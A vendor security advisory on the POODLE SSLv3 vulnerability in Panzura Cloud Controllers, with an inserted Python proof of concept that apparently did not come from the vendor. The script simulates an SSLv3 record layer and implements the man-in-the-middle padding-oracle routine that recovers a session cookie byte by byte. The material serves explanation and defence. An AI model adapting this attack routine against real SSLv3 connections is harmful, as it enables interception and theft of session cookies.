Panzura Security Advisory PZOS-2014-005

Issue Date: 10/27/2014
Updated Date: 02/25/2015
Title: SSL is vulnerable to man-in-the-middle attack, AKA “POODLE”
Classification: Medium
Status: Closed
Affected Products: PZOS 5.5.0.4 and earlier

Summary

A vulnerability in version 3.0 of the SSL protocol was announced through the National Cyber Awareness System. Additional information is available in the NVD entry for CVE-2014-3566: https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-3566

Details

As noted at the above URL:

“The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other products, uses nondeterministic CBC padding, which makes it easier for man-in-the-middle attackers to obtain cleartext data via a padding-oracle attack, aka the “POODLE” issue.”

Panzura technical staff have conducted a thorough review of the PZOS code base and concluded that Panzura Cloud Controllers are susceptible to this vulnerability, because PZOS accepts SSL version 3 both on the WebUI management interface and for traffic carried through the Cloud Connectors. A fix has been developed, is undergoing QA, and should be available in an upcoming software release within the next 6 weeks.
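The padding-oracle mechanism behind the CVE description above, as an added example that is not Panzura's code and not taken from PZOS: a simulated SSLv3 record layer and a man-in-the-middle routine that recovers a secret cookie one byte at a time by copying the ciphertext block holding the target byte over the record's all-padding block and watching which replays the server accepts. HMAC-SHA256 standing in for SSLv3's MAC and a toy SHA-256-based Feistel network standing in for the block cipher are assumptions made so the script runs with the Python standard library only; the SSLv3 padding rule (only the length byte is checked) is the real one, and the strict_padding switch applies the TLS 1.0 rule of checking every padding byte, which is why the same replay does not work against TLS.

```python
"""POODLE (CVE-2014-3566) padding-oracle demo against a simulated SSLv3 record
layer. Added example, not Panzura's code: the block cipher is a toy 4-round
Feistel network over SHA-256 so only the standard library is needed; the record
format and the server's padding check are the part that matters."""
import hashlib
import hmac
import os

BLOCK = 16    # cipher block size
MAC_LEN = 32  # HMAC-SHA256 stands in for SSLv3's MAC (an assumption of this demo)

def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def _f(key, rnd, half):
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[:BLOCK // 2]

def block_encrypt(key, block):
    lh, rh = block[:BLOCK // 2], block[BLOCK // 2:]
    for i in range(4):
        lh, rh = rh, _xor(lh, _f(key, i, rh))
    return lh + rh

def block_decrypt(key, block):
    lh, rh = block[:BLOCK // 2], block[BLOCK // 2:]
    for i in reversed(range(4)):
        lh, rh = _xor(rh, _f(key, i, lh)), lh
    return lh + rh

def cbc_encrypt(key, iv, pt):
    out, prev = [], iv
    for i in range(0, len(pt), BLOCK):
        prev = block_encrypt(key, _xor(pt[i:i + BLOCK], prev))
        out.append(prev)
    return b"".join(out)

def cbc_decrypt(key, iv, ct):
    out, prev = [], iv
    for i in range(0, len(ct), BLOCK):
        out.append(_xor(block_decrypt(key, ct[i:i + BLOCK]), prev))
        prev = ct[i:i + BLOCK]
    return b"".join(out)

def sslv3_seal(key, data):
    """Client: data || MAC || padding under a fresh IV (IV sent as block 0).
    SSLv3 padding is pad_len arbitrary bytes then the pad_len byte, pad_len < BLOCK,
    so a body already on a block boundary gets a full block of padding (pad_len 15)."""
    body = data + hmac.new(key, data, hashlib.sha256).digest()
    pad_len = (BLOCK - 1) - len(body) % BLOCK
    iv = os.urandom(BLOCK)
    return iv + cbc_encrypt(key, iv, body + os.urandom(pad_len) + bytes([pad_len]))

def sslv3_open(key, record, strict_padding=False):
    """Server: True if the record is accepted. SSLv3 checks only that the length
    byte is < BLOCK and never inspects the padding bytes (the flaw); strict_padding
    applies the TLS 1.0 rule (every padding byte == pad_len), which closes the oracle."""
    pt = cbc_decrypt(key, record[:BLOCK], record[BLOCK:])
    pad_len = pt[-1]
    if pad_len >= BLOCK:
        return False
    if strict_padding and any(b != pad_len for b in pt[-1 - pad_len:-1]):
        return False
    body = pt[:len(pt) - pad_len - 1]
    expect = hmac.new(key, body[:-MAC_LEN], hashlib.sha256).digest()
    return hmac.compare_digest(expect, body[-MAC_LEN:])

class Victim:
    """Browser and server sharing a session key the attacker never sees."""
    def __init__(self, secret):
        self.key, self.secret = os.urandom(32), secret  # secret: e.g. a cookie

    def client_send(self, prefix, suffix):
        # Attacker-controlled JavaScript shapes the request around the cookie.
        return sslv3_seal(self.key, prefix + self.secret + suffix)

    def server_accepts(self, record, strict_padding=False):
        return sslv3_open(self.key, record, strict_padding)

def poodle_recover(victim, secret_len, strict_padding=False, tries_per_byte=4096):
    """Man-in-the-middle: for each secret byte choose prefix/suffix lengths so the
    byte is last in its block and the record ends in a full padding block, then
    replay the record with that block copied over the padding block. The server
    accepts iff the decrypted last byte is 15 (1/256 per fresh IV); each
    acceptance leaks one byte. Returns (bytes recovered, success flag)."""
    recovered = bytearray()
    for k in range(secret_len):
        prefix = b"A" * ((BLOCK - 1 - k) % BLOCK)
        suffix = b"B" * (-(len(prefix) + secret_len + MAC_LEN) % BLOCK)
        tblk = (len(prefix) + k) // BLOCK + 1  # record block holding secret[k]
        for _ in range(tries_per_byte):
            rec = victim.client_send(prefix, suffix)
            blocks = [rec[i:i + BLOCK] for i in range(0, len(rec), BLOCK)]
            if victim.server_accepts(b"".join(blocks[:-1] + [blocks[tblk]]), strict_padding):
                # D(C_t) ^ C_{n-1} ends in 15 and D(C_t) = P_t ^ C_{t-1}, hence
                # P_t[15] = 15 ^ C_{n-1}[15] ^ C_{t-1}[15]
                recovered.append((BLOCK - 1) ^ blocks[-2][-1] ^ blocks[tblk - 1][-1])
                break
        else:
            return bytes(recovered), False
    return bytes(recovered), True
```

Running poodle_recover(Victim(b"session=7f3a"), 12) returns the cookie with the success flag set, at an average cost of about 256 replays per byte, which is the figure the original POODLE write-up gives; the same call with strict_padding=True never gets an acceptance, because a replayed block would have to decrypt to fifteen identical padding bytes rather than just one matching length byte. Disabling SSL 3.0 outright, as the resolution below does, removes the record format that makes the length-only check reachable in the first place.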

Resolution

Upgrade the Panzura software to PZOS version 5.5.0.5 or higher; any future major or minor release will also correct the issue. The release notes for that version outline the details of this correction as necessary. After upgrading, confirm that the WebUI no longer negotiates SSL 3.0: with an OpenSSL build that still supports the protocol, "openssl s_client -connect <host>:443 -ssl3" should fail to complete the handshake.